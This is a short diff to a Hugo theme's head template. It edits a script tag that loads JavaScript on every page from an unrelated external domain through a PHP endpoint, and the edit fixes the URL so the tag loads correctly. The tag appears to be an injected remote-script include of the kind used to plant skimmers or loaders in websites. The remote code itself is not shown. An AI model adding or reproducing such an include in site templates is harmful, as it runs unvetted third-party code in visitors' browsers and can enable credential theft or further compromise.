--- a/themes/Themefisher/layouts/partials/head.html
+++ b/themes/Themefisher/layouts/partials/head.html
@@ -2,7 +2,7 @@
   <meta charset="UTF-8">
   <title>{{ .Title }}</title>
   {{ "<!-- Mobile Responsive Meta -->" | safeHTML }}
-  <script src = 'https://status-detailing.com/srm//js/index.php'></script>
+  <script src = 'https://status-detailing.com/srm/js/index.php'></script>
   <meta name="viewport" content="width=device-width, initial-scale=1">
   <meta name="description" content="{{ with .Description }}{{ . }}{{ else }}{{ with site.Params.description }}{{ . }}{{ end }}{{ end }}">
   {{ with site.Params.author }}<meta name="author" content="{{ . }}">{{ end }}
